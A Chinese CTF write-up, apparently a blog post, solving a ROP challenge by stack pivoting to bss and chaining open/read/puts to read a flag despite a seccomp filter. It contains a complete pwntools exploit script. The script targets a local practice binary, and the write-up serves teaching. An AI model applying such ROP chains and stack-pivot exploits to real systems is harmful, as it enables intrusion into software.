解题记录(3)

这是一篇关于解决一个包含栈溢出漏洞的ROP题目记录。由于没有Canary和PIE保护,通过栈溢出控制返回地址。由于seccomp限制,无法直接执行system或execve获取shell。解决方案是利用open和read函数读取flag,通过构造栈数据和栈迁移实现目标。

解题记录(3)

这道题是一个rop的题目,漏洞利用很简单,但这题有不一样的地方

题目

如下,没有Canary和PIE保护,因此能够想到的就是栈溢出了
在这里插入图片描述
main函数如下
在这里插入图片描述

从main函数中,能够直观的发存在一个栈溢出
但是这里能够发现的是只能够溢出0x10字节,也就是只能控制程序的返回地址和基地址

再来看看init函数里面的东西
在这里插入图片描述

seccomp(全称securecomputing mode)是linuxkernel从2.6.23版本开始所支持的一种安全机制。通过seccomp,我们限制程序使用某些系统调用,这样可以减少系统的暴露面,同时是程序进入一种“安全”的状态。

那么很明显,这里不能使用系统调用,就没办法获取shell了

分析

不能够执行system或者execve函数,但程序中的函数还是能使用的
我们的目的是获去flag,那么只需要调用open函数去打开flag文件,然后用read去读取,之后在打印出来即可
对于溢出只能溢出0x10字节,这里就需要借助main中第一个read了

这里的buf是处于bss段的,因此可以在这里构造栈数据,之后通过溢出 的0x10字节,修改rbp和rip进行栈迁移就行了在这里插入图片描述栈迁移

需要借助指令leave
这条指令会将rbp的值赋值给rsp,然后执行pop rbp
main函数执行完后就会执行
leave; retn
加入溢出的0x10字节是fake_rbp = 0x600000和fake_rip = leave_addr
那么leave执行后rsp = rbp,rbp = 0x600000
然后执行retn在去执行leave
那么rsp = rbp = 0x600000,这样就完成了栈迁移

exp

from pwn import *
p = process('./ROP')
elf = ELF('./ROP')
libc = ELF('/home/sixi/Desktop/libc-2.23.so')

def debug():
	gdb.attach(p)
	pause()

loc_6pr = 0x400a36
loc_call = 0x400a20

bss_addr = 0x6010a0 - 0x8
leave = 0x40090d
rdi_ret = 0x400a43
main = elf.sym['main']

p.recvuntil("It's just a little bit harder...Do you think so?\n")
payload = p64(loc_6pr)
payload += p64(1) + p64(0) + p64(1) + p64(elf.got['open']) + p64(0x100) + p64(0) + p64(bss_addr + 0x8 * 10)
payload += p64(loc_call)
payload += b'./flag\x00\x00' + p64(0) + p64(1) + p64(elf.got['read']) + p64(0x100) + p64(bss_addr) + p64(4)
payload += p64(loc_call)
payload += p64(0) * 7 + p64(rdi_ret) + p64(bss_addr) + p64(elf.sym['puts'])

p.send(payload)
payload1 = b'a' * 0x50 + p64(bss_addr) + p64(leave)
p.recvline()
p.send(payload1)
p.recvline()
print(p.recvline())
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值